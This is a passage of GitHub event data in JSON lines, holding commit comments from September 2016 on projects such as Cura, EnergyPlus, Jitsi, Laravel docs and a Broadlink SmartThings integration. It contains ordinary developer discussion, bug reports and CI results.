useful, when you get some time, to have a readme or informal comments here explaining how this should be used, especially how and when to use the alternate on and off commands, how to set up their devices if different from the main readme instructions, and how/under what circumstances to implement the delay features. If I integrate this into the master I will incorporate that content into the main readme as well.\n\n\n\n\nOn September 9, 2016 7:56:23 AM EDT, itsamti <notifications@github.com> wrote:\n>This code is working for me. I tested it with second \"sendHubCommand\"\n>had 'toggle' hardcoded to 'off' and increased delay to 15000 ms. I\n>could see that if I press ON button, Lamp will turn on and turns off\n>after 15 seconds. Please see log below\n>\n>7:48:31 AM: debug Running REST API Command\n>http://192.168.1.154:7474/code/S3SW2%20off\n>7:48:31 AM: debug dEnd = 1473421711567\n>7:48:31 AM: debug Slept 15001ms\n>7:48:16 AM: debug dStart = 1473421696566\n>7:48:16 AM: debug start sleeping\n>7:48:16 AM: debug Running REST API Command\n>http://192.168.1.154:7474/code/S3SW2%20off\n>7:48:16 AM: debug PUBLISHED off()\n>\n>\n>I have added new commands onphysical  and offphysical as I changed\n>switch layout. Its not just toggle but you will also see ON and OFF\n>button on right.\n>\n>Lot of code is commented out as I had been trying different options to\n>make delay work. I will have to cleanup.\n>\n>version is just for sending debug log what button pressed.\n>\n>I will update code as soon as I get sometime.\n>\n>\n>\n>-- \n>You are receiving this because you commented.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/beckyricha/Broadlink-RM-SmartThings-Alexa/commit/62f4e2eb22d7031b27f01fa42dbf53e8549234f7#commitcomment-18961382\n\n-- \nSent from my Android device with K-9 Mail. Please excuse my brevity."}},"created_at":"2016-09-09T12:49:42Z"}
{"id":"4539878422","type":"CommitCommentEvent","actor":{"login":"jom7"},"repo":{"name":"jom7/Project1"},"payload":{"comment":{"id":18962053,"position":null,"line":null,"path":null,"commit_id":"e28b271647c1d779eb006333693bcf096401d5d1","created_at":"2016-09-09T12:51:58Z","updated_at":"2016-09-09T12:51:58Z","body":"Readme for Project 1 for Jeffrey Murphy and Taylor Lookabaugh"}},"created_at":"2016-09-09T12:51:58Z"}
{"id":"4539893714","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18962083,"position":null,"line":null,"path":null,"commit_id":"c254737e250f30870616b07221aba11c057568a5","created_at":"2016-09-09T12:55:20Z","updated_at":"2016-09-09T12:55:20Z","body":"Got the effect here that the printing monitor says that my printer is not connected, but the \"Print via USB\" correctly appeared after plugging in my printer (BH2). The print started (and still running), but the monitor still says: \"Not connected\" and doesn't display any values (eg. temperature, progress, etc.).\r\nIs this commit a possible fix?"}},"created_at":"2016-09-09T12:55:20Z"}
{"id":"4539899306","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18962095,"position":null,"line":null,"path":null,"commit_id":"f0abd864ae4464c10e7bd6a6f712acec25744a55","created_at":"2016-09-09T12:56:37Z","updated_at":"2016-09-09T12:56:37Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1568 of 2080 tests passed, 37 test warnings)\n\n * 539 tests had: AUD diffs.\n * 530 tests had: EIO diffs.\n * 422 tests had: ESO small diffs.\n * 90 tests had: ERR diffs.\n * 512 tests had: RDD diffs.\n * 497 tests had: Table big diffs.\n * 116 tests had: ESO big diffs.\n * 420 tests had: BND diffs.\n * 360 tests had: MTR small diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 29 tests had: DXF diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.38%25-red.svg)</a> \n"}},"created_at":"2016-09-09T12:56:37Z"}
{"id":"4539899652","type":"CommitCommentEvent","actor":{"login":"becky000"},"repo":{"name":"becky000/nohtavian"},"payload":{"comment":{"id":18962098,"position":null,"line":null,"path":null,"commit_id":"cea01500af1478fbba9c3f836ececd9824117adc","created_at":"2016-09-09T12:56:41Z","updated_at":"2016-09-09T12:56:41Z","body":"Add bird icon as bullets in journals directory and edit lifelist from notes to include the new bird fields from entries."}},"created_at":"2016-09-09T12:56:41Z"}
{"id":"4539900810","type":"CommitCommentEvent","actor":{"login":"cveneziani"},"repo":{"name":"lewagon/quizzes"},"payload":{"comment":{"id":18962101,"position":35,"line":38,"path":"pdf/index.html","commit_id":"1d88d8460ce3b49003bc69d18bf837ed53844169","created_at":"2016-09-09T12:56:58Z","updated_at":"2016-09-09T12:56:58Z","body":"You forgot to update the links on Kitt :scream: "}},"created_at":"2016-09-09T12:56:58Z"}
{"id":"4539904171","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"ezio84/pnmod-manifest"},"payload":{"comment":{"id":18962107,"position":null,"line":null,"path":null,"commit_id":"704b21e19203a1f6df5d1b9523faf15ac9e6107f","created_at":"2016-09-09T12:57:42Z","updated_at":"2016-09-09T12:57:42Z","body":"new straight fork for the lge blobs tree from razorloves, i've no time to grab and push a new mm2oms branch because this tree has a lot of device and the download/upload size is huge"}},"created_at":"2016-09-09T12:57:42Z"}
{"id":"4539911260","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18962129,"position":null,"line":null,"path":null,"commit_id":"6dda1bd1f9f8761744cdd95e921bbcaa50bd66e3","created_at":"2016-09-09T12:59:15Z","updated_at":"2016-09-09T12:59:15Z","body":"yeah dev eng for all country "}},"created_at":"2016-09-09T12:59:15Z"}
{"id":"4539914616","type":"CommitCommentEvent","actor":{"login":"bensinober"},"repo":{"name":"digibib/koha-docker"},"payload":{"comment":{"id":18962138,"position":null,"line":null,"path":null,"commit_id":"73916df1ed26f9dfc0d91cb3e329d171b683b41a","created_at":"2016-09-09T12:59:59Z","updated_at":"2016-09-09T12:59:59Z","body":"bare tull fra min side ;) fikset nå"}},"created_at":"2016-09-09T12:59:59Z"}
{"id":"4539917786","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18962152,"position":null,"line":null,"path":null,"commit_id":"44ee21163c60d7d31473e4500d894e7160a41ad9","created_at":"2016-09-09T13:00:38Z","updated_at":"2016-09-09T13:00:38Z","body":"Does somebody understand why bench is changing with this patch ?"}},"created_at":"2016-09-09T13:00:38Z"}
{"id":"4539919482","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18962156,"position":null,"line":null,"path":null,"commit_id":"27695f27f6f11409e1be7d1e86030b45d2e98bf0","created_at":"2016-09-09T13:00:59Z","updated_at":"2016-09-09T13:00:59Z","body":"Yes : but it's not the actual case in LimeSurvey : https://github.com/LimeSurvey/LimeSurvey/blob/master/application/models/TemplateConfiguration.php#L216\r\n\r\nWhen LS core use assetdirectory in config (and don't move uneeded pstpl files to asset). And don't move existing PHP files on asset public url. I can use it.\r\n\r\n"}},"created_at":"2016-09-09T13:00:59Z"}
{"id":"4539919778","type":"CommitCommentEvent","actor":{"login":"aycabta"},"repo":{"name":"rubygems/rubygems.org"},"payload":{"comment":{"id":18962159,"position":null,"line":null,"path":null,"commit_id":"53eadf5184bad12e9e6093108fdd8b3dd7c55475","created_at":"2016-09-09T13:01:03Z","updated_at":"2016-09-09T13:01:03Z","body":"OK, I understood. This is reverted at https://github.com/rubygems/rubygems.org/pull/1408/commits/b96768a0ee6ef21f6e0af0a4c266d853c1e0efb5."}},"created_at":"2016-09-09T13:01:03Z"}
{"id":"4539919942","type":"CommitCommentEvent","actor":{"login":"null"},"repo":{"name":"n-multimedia/onlinekurslabor"},"payload":{"comment":{"id":18962160,"position":117,"line":117,"path":"web/sites/all/modules/onlinekurslabor/custom_general/modules/section_content/js/section_content.js","commit_id":"65029a6ac917e31e62fae4e72e0b7cfc98fbfd5d","created_at":"2016-09-09T13:01:05Z","updated_at":"2016-09-09T13:01:05Z","body":"console.log"}},"created_at":"2016-09-09T13:01:05Z"}
{"id":"4539924487","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18962173,"position":null,"line":null,"path":null,"commit_id":"c254737e250f30870616b07221aba11c057568a5","created_at":"2016-09-09T13:02:00Z","updated_at":"2016-09-09T13:02:00Z","body":"Nope. This only handles the pause / resume button. "}},"created_at":"2016-09-09T13:02:00Z"}
{"id":"4539927300","type":"CommitCommentEvent","actor":{"login":"idgserpro"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18962184,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-09T13:02:36Z","updated_at":"2016-09-09T13:02:36Z","body":"@hvelarde We created a branch pinning to 1.7.0 in https://github.com/collective/collective.cover/tree/plone_tiles_170 to reproduce the broken build. You can see that the build breaks here: https://travis-ci.org/collective/collective.cover/jobs/158724609\r\n\r\n`AttributeError: 'PersistentCoverTileDataManager' object has no attribute 'annotations'`\r\n"}},"created_at":"2016-09-09T13:02:36Z"}
{"id":"4539935386","type":"CommitCommentEvent","actor":{"login":"hamsternik"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18962205,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:04:23Z","updated_at":"2016-09-09T13:04:23Z","body":"\"BSD systems have a readlink command, with different capabilities from GNU readlink. In particular, BSD readlink does not have an option to canonicalize paths, it only traverses the symlink passed to it.\" (c)\r\nSo, the root of the problem isn't in OS X :D"}},"created_at":"2016-09-09T13:04:23Z"}
{"id":"4539935796","type":"CommitCommentEvent","actor":{"login":"sacco395"},"repo":{"name":"sacco395/hondana_android"},"payload":{"comment":{"id":18962206,"position":null,"line":null,"path":null,"commit_id":"a682a5c64af97abf6a1a13fe9fe331b6d62ffa3d","created_at":"2016-09-09T13:04:28Z","updated_at":"2016-09-09T13:04:28Z","body":"トップとガイドとお問い合わせはonDrawerOpenedに判定をさせてみました。\r\nonDrawerOpenedだとヌルヌルと表示されるので、どうにかしたい。"}},"created_at":"2016-09-09T13:04:28Z"}
{"id":"4539937568","type":"CommitCommentEvent","actor":{"login":"k33g"},"repo":{"name":"k33g/bob.the.bot"},"payload":{"comment":{"id":18962211,"position":31,"line":10,"path":"scripts/feature.hendrix.js","commit_id":"5e4aec1325fe5bdb04cac2f84def694b102aa56e","created_at":"2016-09-09T13:04:51Z","updated_at":"2016-09-09T13:04:51Z","body":"@titimoby yes you're right. no need here"}},"created_at":"2016-09-09T13:04:51Z"}
{"id":"4539938621","type":"CommitCommentEvent","actor":{"login":"Marty-D"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18962213,"position":null,"line":null,"path":null,"commit_id":"337d4cb10dcdc7e87a2d8ae06a7ac149c61ef2b7","created_at":"2016-09-09T13:05:08Z","updated_at":"2016-09-09T13:05:08Z","body":"You seem to be missing the part that makes sure PU doesn't use this new clause that I intentionally muddled the original clause for."}},"created_at":"2016-09-09T13:05:08Z"}
{"id":"4539940810","type":"CommitCommentEvent","actor":{"login":"lyubomir"},"repo":{"name":"jitsi/lib-jitsi-meet"},"payload":{"comment":{"id":18962223,"position":31,"line":58,"path":"JitsiParticipant.js","commit_id":"56328fcf588593ec4985470ffefd70032ac41ef5","created_at":"2016-09-09T13:05:36Z","updated_at":"2016-09-09T13:05:36Z","body":"The signature of the callback that is the first argument to Array.prototype.reduce is not the one that's used in JitsiParticipant.prototype.isAudioMuted or isVideoMuted: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce. Consequently, I presume that the 2 JitsiParticipant methods in question don't produce the respective expected results."}},"created_at":"2016-09-09T13:05:36Z"}
{"id":"4539943149","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18962228,"position":null,"line":null,"path":null,"commit_id":"27695f27f6f11409e1be7d1e86030b45d2e98bf0","created_at":"2016-09-09T13:06:10Z","updated_at":"2016-09-09T13:06:10Z","body":"it's possible to filter what files are moved to the assets dir (I should have done it before, it's just a parameter to add)"}},"created_at":"2016-09-09T13:06:10Z"}
{"id":"4539946307","type":"CommitCommentEvent","actor":{"login":"r4m1live"},"repo":{"name":"eni9889/pptweaks"},"payload":{"comment":{"id":18962240,"position":null,"line":null,"path":null,"commit_id":"fb4d51776d4cea67483bf48305ac9a4f0d8c4f40","created_at":"2016-09-09T13:06:49Z","updated_at":"2016-09-09T13:06:49Z","body":"how can i use it : ) \r\n\r\nits same problem crash in snapchat++ "}},"created_at":"2016-09-09T13:06:49Z"}
{"id":"4539949105","type":"CommitCommentEvent","actor":{"login":"xavcz"},"repo":{"name":"TelescopeJS/Telescope"},"payload":{"comment":{"id":18962246,"position":null,"line":null,"path":null,"commit_id":"cbd9141e78e544c1f61c42c0ea1078d38adf5459","created_at":"2016-09-09T13:07:24Z","updated_at":"2016-09-09T13:07:24Z","body":"Oops, my bad! Thanks for the heads up, mixin addon is still needed for the current implementation of `react-meteor-data`. I just updated `devel`, a quick `git pull` + `npm install` should fix the problem 👍 "}},"created_at":"2016-09-09T13:07:24Z"}
{"id":"4539953700","type":"CommitCommentEvent","actor":{"login":"deruelle"},"repo":{"name":"RestComm/load-balancer"},"payload":{"comment":{"id":18962254,"position":15,"line":121,"path":"jar/src/main/java/org/mobicents/tools/http/balancer/HttpRequestHandler.java","commit_id":"a95027e3ae6288a5c61f66837915279bcf4d3d58","created_at":"2016-09-09T13:08:23Z","updated_at":"2016-09-09T13:08:23Z","body":"I don't think we should check terminateTLSTraffic. It shouldn't matter we should always redirect to HTTPs so the connection appear secure from the end user even if the HTTPS traffic is terminated within the private network"}},"created_at":"2016-09-09T13:08:23Z"}
{"id":"4539955479","type":"CommitCommentEvent","actor":{"login":"rasendubi"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18962257,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:08:45Z","updated_at":"2016-09-09T13:08:45Z","body":"yeah. I haven't said OS X is root cause"}},"created_at":"2016-09-09T13:08:45Z"}
{"id":"4539955887","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18962261,"position":null,"line":null,"path":null,"commit_id":"c254737e250f30870616b07221aba11c057568a5","created_at":"2016-09-09T13:08:50Z","updated_at":"2016-09-09T13:08:50Z","body":"Hmm, will update my PPA and retry.\r\nMade another test to check whether it is reproducable and it began the same, but after a while it got the temperatures from the printer."}},"created_at":"2016-09-09T13:08:50Z"}
{"id":"4539956891","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18962263,"position":null,"line":null,"path":null,"commit_id":"de7f4cd200a6d9c51c935196124d7655575ced9e","created_at":"2016-09-09T13:09:04Z","updated_at":"2016-09-09T13:09:04Z","body":"Should we re-add the file-check or was that implemented somewhere else?"}},"created_at":"2016-09-09T13:09:04Z"}
{"id":"4539957101","type":"CommitCommentEvent","actor":{"login":"lyubomir"},"repo":{"name":"jitsi/lib-jitsi-meet"},"payload":{"comment":{"id":18962264,"position":32,"line":59,"path":"JitsiParticipant.js","commit_id":"56328fcf588593ec4985470ffefd70032ac41ef5","created_at":"2016-09-09T13:09:08Z","updated_at":"2016-09-09T13:09:08Z","body":"I find the use of track.isVideoTrack() to be not the best expression of the (supposed) intention here. As far as I understand, the (failed) attempt here was to determine that all audio tracks of a participant are muted. So the best expression would be that either the track is muted or is not audio i.e. one doesn't really care that it's video."}},"created_at":"2016-09-09T13:09:08Z"}
{"id":"4539962784","type":"CommitCommentEvent","actor":{"login":"lyubomir"},"repo":{"name":"jitsi/lib-jitsi-meet"},"payload":{"comment":{"id":18962271,"position":43,"line":69,"path":"JitsiParticipant.js","commit_id":"56328fcf588593ec4985470ffefd70032ac41ef5","created_at":"2016-09-09T13:10:24Z","updated_at":"2016-09-09T13:10:24Z","body":"Well, duplication can get you only as far as... 2 incorrect method implementations."}},"created_at":"2016-09-09T13:10:24Z"}
{"id":"4539966361","type":"CommitCommentEvent","actor":{"login":"bengunter"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18962279,"position":40,"line":132,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/Geolocation.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-09T13:11:08Z","updated_at":"2016-09-09T13:11:08Z","body":"I was tasked with integrating our code into your project. The intent here was to separate your Geolocation class from MaxMind's CityResponse class so that it could easily be used with either provider. At the very least, Geolocation needs a new constructor that takes something besides CityResponse."}},"created_at":"2016-09-09T13:11:08Z"}
{"id":"4539970282","type":"CommitCommentEvent","actor":{"login":"nightlyop"},"repo":{"name":"nightlyop/Chart.js"},"payload":{"comment":{"id":18962282,"position":null,"line":null,"path":null,"commit_id":"f75add99364631b4d17607c63085df5346d9c1ed","created_at":"2016-09-09T13:11:58Z","updated_at":"2016-09-09T13:11:58Z","body":"Remove link to extension which does not work with current version of Chart.js and added another extension."}},"created_at":"2016-09-09T13:11:58Z"}
{"id":"4539977193","type":"CommitCommentEvent","actor":{"login":"magnars"},"repo":{"name":"kodemaker/kodemaker.no"},"payload":{"comment":{"id":18962299,"position":null,"line":null,"path":null,"commit_id":"724a03f91fb1919086a0e2813d305a2670fce1f9","created_at":"2016-09-09T13:13:28Z","updated_at":"2016-09-09T13:13:28Z","body":":+1:"}},"created_at":"2016-09-09T13:13:28Z"}
{"id":"4539983382","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"jiangbianwanghai/laravel-docs"},"payload":{"comment":{"id":18962309,"position":97,"line":89,"path":"blade.md","commit_id":"d8691e253cc652844c5a8d8196b9458b0138e88e","created_at":"2016-09-09T13:14:53Z","updated_at":"2016-09-09T13:14:53Z","body":"    『 中括号 』\r\n\r\n为了保持与 5.1 和 5.2 的统一，请使用以下类型的引号，并且在符号和文字间不要有空格，请整篇文章保持一致：\r\n\r\n    「中括号」\r\n"}},"created_at":"2016-09-09T13:14:53Z"}
{"id":"4539985311","type":"CommitCommentEvent","actor":{"login":"GenevievePlantin"},"repo":{"name":"Icinga/icingaweb2-module-director"},"payload":{"comment":{"id":18962313,"position":4,"line":33,"path":"application/forms/IcingaServiceForm.php","commit_id":"b2b189c4253c6997bc223b662f787d77c0eaa677","created_at":"2016-09-09T13:15:17Z","updated_at":"2016-09-09T13:15:17Z","body":"Hi, I was trying to add service to a host when i got an error in the UI (see the full error in the print screen I joined) When I have no service template, this error is shown. However, when I create a service template, there is no error.  \r\n![capture d ecran 2016-09-09 a 09 06 14](https://cloud.githubusercontent.com/assets/7543106/18387987/add1ebdc-766d-11e6-9ea4-9d592f13d630.png)\r\n\r\n"}},"created_at":"2016-09-09T13:15:17Z"}
{"id":"4539987395","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"jiangbianwanghai/laravel-docs"},"payload":{"comment":{"id":18962318,"position":158,"line":137,"path":"blade.md","commit_id":"d8691e253cc652844c5a8d8196b9458b0138e88e","created_at":"2016-09-09T13:15:42Z","updated_at":"2016-09-09T13:15:42Z","body":"👍 "}},"created_at":"2016-09-09T13:15:42Z"}
{"id":"4539987972","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"jiangbianwanghai/laravel-docs"},"payload":{"comment":{"id":18962319,"position":140,"line":122,"path":"blade.md","commit_id":"d8691e253cc652844c5a8d8196b9458b0138e88e","created_at":"2016-09-09T13:15:49Z","updated_at":"2016-09-09T13:15:49Z","body":"👍 "}},"created_at":"2016-09-09T13:15:49Z"}
{"id":"4539991273","type":"CommitCommentEvent","actor":{"login":"bengunter"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18962324,"position":51,"line":51,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-09T13:16:30Z","updated_at":"2016-09-09T13:16:30Z","body":"And do what with the boolean? This method checks that service is in a valid state. If the service isn't in a valid state at the time this method is called then some type of exception _will_ be thrown at some point. Checking the state and throwing an exception with an explanatory message makes it much easier to determine what went wrong."}},"created_at":"2016-09-09T13:16:30Z"}
{"id":"4539991523","type":"CommitCommentEvent","actor":{"login":"bengunter"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18962325,"position":58,"line":58,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-09T13:16:33Z","updated_at":"2016-09-09T13:16:33Z","body":"See above."}},"created_at":"2016-09-09T13:16:33Z"}
{"id":"4539993679","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/Myomyw"},"payload":{"comment":{"id":18962330,"position":null,"line":null,"path":null,"commit_id":"ce39e600af796be03a7c31839f30c99092771ee0","created_at":"2016-09-09T13:17:02Z","updated_at":"2016-09-09T13:17:02Z","body":"Nice job"}},"created_at":"2016-09-09T13:17:02Z"}
{"id":"4539995329","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"jiangbianwanghai/laravel-docs"},"payload":{"comment":{"id":18962335,"position":7,"line":14,"path":"localization.md","commit_id":"0e838c1f828e1defd9db7ffc4d1e37aec18c1d8e","created_at":"2016-09-09T13:17:22Z","updated_at":"2016-09-09T13:17:22Z","body":"     语言语言包\r\n\r\n重复字"}},"created_at":"2016-09-09T13:17:22Z"}
{"id":"4539998962","type":"CommitCommentEvent","actor":{"login":"hirowgit"},"repo":{"name":"G-Node/jnode_nix"},"payload":{"comment":{"id":18962343,"position":null,"line":null,"path":null,"commit_id":"09a88a41fde19bf7978d461876976470849be7d6","created_at":"2016-09-09T13:18:10Z","updated_at":"2016-09-09T13:18:10Z","body":"Super!!\r\n"}},"created_at":"2016-09-09T13:18:10Z"}
{"id":"4540000150","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog-ui"},"payload":{"comment":{"id":18962346,"position":null,"line":null,"path":null,"commit_id":"ca6153cb78906300da83149bf9b354eb474d0d8a","created_at":"2016-09-09T13:18:24Z","updated_at":"2016-09-09T13:18:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#BSYLKl9jR5axQxFjrfK4GQ"}},"created_at":"2016-09-09T13:18:24Z"}
{"id":"4540000350","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"jiangbianwanghai/laravel-docs"},"payload":{"comment":{"id":18962347,"position":37,"line":41,"path":"localization.md","commit_id":"0e838c1f828e1defd9db7ffc4d1e37aec18c1d8e","created_at":"2016-09-09T13:18:27Z","updated_at":"2016-09-09T13:18:27Z","body":"『 备用语言 』统一使用「」，符号与文字中间不要有空格。"}},"created_at":"2016-09-09T13:18:27Z"}
{"id":"4540003787","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18962423,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-09T13:19:11Z","updated_at":"2016-09-09T13:19:11Z","body":"@datakurre this need to have a workaround or we can't name the release 1.7, but 2.0."}},"created_at":"2016-09-09T13:19:11Z"}
{"id":"4540004077","type":"CommitCommentEvent","actor":{"login":"jelkosz"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":18962429,"position":null,"line":null,"path":null,"commit_id":"7871b4b3c95c4aa5bfc1ba23dac088ff61f7b095","created_at":"2016-09-09T13:19:14Z","updated_at":"2016-09-09T13:19:14Z","body":"@chessbyte LGTM"}},"created_at":"2016-09-09T13:19:14Z"}
{"id":"4540004295","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18962435,"position":null,"line":null,"path":null,"commit_id":"bf24245179f3b249fab8a00f8fc1011331693276","created_at":"2016-09-09T13:19:17Z","updated_at":"2016-09-09T13:19:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#FntXqdqTSrqXy4lRzWQUFg"}},"created_at":"2016-09-09T13:19:17Z"}
{"id":"4540012460","type":"CommitCommentEvent","actor":{"login":"kbraak"},"repo":{"name":"gbif/portal-web"},"payload":{"comment":{"id":18962537,"position":null,"line":null,"path":null,"commit_id":"0cbf239b46b3332f40fe149dfd528921be22c808","created_at":"2016-09-09T13:21:00Z","updated_at":"2016-09-09T13:21:00Z","body":"Fixes [POR-3124](http://dev.gbif.org/issues/browse/POR-3124)"}},"created_at":"2016-09-09T13:21:00Z"}
{"id":"4540015683","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18962541,"position":null,"line":null,"path":null,"commit_id":"43012999947caf995936c14573ac24076afc52ee","created_at":"2016-09-09T13:21:42Z","updated_at":"2016-09-09T13:21:42Z","body":"#4 "}},"created_at":"2016-09-09T13:21:42Z"}
{"id":"4540016976","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":18962545,"position":null,"line":null,"path":null,"commit_id":"c0fe59747754ad75942ca4363453069a2e7c98c6","created_at":"2016-09-09T13:21:58Z","updated_at":"2016-09-09T13:21:58Z","body":"#4 "}},"created_at":"2016-09-09T13:21:58Z"}
{"id":"4540017335","type":"CommitCommentEvent","actor":{"login":"ashoksoni"},"repo":{"name":"ResurrectionRemix-Devices/android_device_samsung_jf-common"},"payload":{"comment":{"id":18962546,"position":null,"line":null,"path":null,"commit_id":"7373cb0c39351ec9842cf2db815b4993c6db312c","created_at":"2016-09-09T13:22:02Z","updated_at":"2016-09-09T13:22:02Z","body":"I have the option to add hardware keys tile to my qs but adding that doesn't make it appear in my qs. Will adding this commit to my project make it work as I read that on your GPlus community."}},"created_at":"2016-09-09T13:22:02Z"}
{"id":"4540038270","type":"CommitCommentEvent","actor":{"login":"lanaperisa"},"repo":{"name":"lanaperisa/Tensors.jl"},"payload":{"comment":{"id":18962594,"position":null,"line":null,"path":null,"commit_id":"9071bcc8a59d5721cad560bab92bbed5bf06049f","created_at":"2016-09-09T13:26:16Z","updated_at":"2016-09-09T13:26:16Z","body":"First pass."}},"created_at":"2016-09-09T13:26:16Z"}
{"id":"4540041349","type":"CommitCommentEvent","actor":{"login":"bengunter"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18962598,"position":45,"line":45,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-09T13:26:52Z","updated_at":"2016-09-09T13:26:52Z","body":"It's direct memory reads vs. seek/read system calls. There can be a big difference in performance when it comes to random access. The code that reads our database files does a lot of random access. Sorry, I don't have any benchmarks to cite."}},"created_at":"2016-09-09T13:26:52Z"}
{"id":"4540043283","type":"CommitCommentEvent","actor":{"login":"dodgepong"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18962601,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-09T13:27:16Z","updated_at":"2016-09-09T13:27:16Z","body":"> Maybe I'm wrong.\r\n\r\nYou are indeed wrong.\r\n\r\nIf you can't understand the importance of feature parity with the legacy version to help people make the switch, I don't know what to tell you.\r\n\r\nStudio Mode in no way supplants the idea of auto-switching -- users want the ability to be able to switch their scenes depending on the context of what they are currently doing without having to even bother looking at or messing with OBS so they can focus on what they are doing instead of fiddling with the stream."}},"created_at":"2016-09-09T13:27:16Z"}
{"id":"4540043863","type":"CommitCommentEvent","actor":{"login":"zqq707297386"},"repo":{"name":"zqq707297386/bookshop"},"payload":{"comment":{"id":18962603,"position":null,"line":null,"path":null,"commit_id":"a14fed5361877966089dbb5c4b7a55337def7afe","created_at":"2016-09-09T13:27:23Z","updated_at":"2016-09-09T13:27:23Z","body":"需要php5.6.4或以上的版本才支持"}},"created_at":"2016-09-09T13:27:23Z"}
{"id":"4540044106","type":"CommitCommentEvent","actor":{"login":"Thomas-Gelf"},"repo":{"name":"Icinga/icingaweb2-module-director"},"payload":{"comment":{"id":18962604,"position":4,"line":33,"path":"application/forms/IcingaServiceForm.php","commit_id":"b2b189c4253c6997bc223b662f787d77c0eaa677","created_at":"2016-09-09T13:27:26Z","updated_at":"2016-09-09T13:27:26Z","body":"@GenevievePlantin: fixed, thanks for reporting this."}},"created_at":"2016-09-09T13:27:26Z"}
